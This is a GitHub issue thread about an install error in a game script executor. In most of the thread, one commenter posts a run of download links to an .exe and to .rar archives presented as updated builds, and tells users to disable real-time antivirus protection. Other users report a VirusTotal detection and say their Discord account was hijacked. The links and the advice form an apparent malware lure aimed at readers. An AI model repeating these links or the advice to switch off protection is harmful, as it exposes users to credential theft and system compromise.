### ISSUE TITLE
unable to install

### ISSUE THREAD

**Issue by jackhacksren** [solaraofficial/Solara-Executor#1]
it did windows error code 0xc00000e9

**Comment by elderCZE** [comment]
Try this just make sure to turn off real time protection https://cdn.discordapp.com/attachments/1148307154944667711/1241727926085484565/Nexus.exe?ex=66829fbf&is=66814e3f&hm=811f721093c89483f62116429febe5d09d1821c7369a2c28fd8ebd51d8b8e798&

**Comment by elderCZE** [comment]
I hope it helped.

**Comment by svaldiviesoz27** [comment]
The file is down

**Comment by elderCZE** [comment]
ill update it

**Comment by elderCZE** [comment]
new link https://www.mediafire.com/file/71klo8hc7y0wszc/Solara+Updated.rar/file

**Comment by ItzzDevXV** [comment]
is it updated?

**Comment by elderCZE** [comment]
Updated: https://www.mediafire.com/file/mc20l7wnoqwcriv/Solara_Updated.rar/file

**Comment by Gamerbros104** [comment]
> Updated: https://www.mediafire.com/file/mc20l7wnoqwcriv/Solara_Updated.rar/file

its a virus: https://www.virustotal.com/gui/file/57e16b00b8ebd25d48c55d16e344828ecb8c9f0734580f02b6db31192f195951?nocache=1

**Comment by elderCZE** [comment]
try this if that one doesent work fo u: https://www.mediafire.com/file/ilqmrroytszbu0w/Solara_UpdatedV.2.0.rar/file

**Comment by dumbwhisper** [comment]
none of them work for me

**Comment by svaldiviesoz27** [comment]
Yup, I already got my discord hacked and had to reinstall windows, thank you
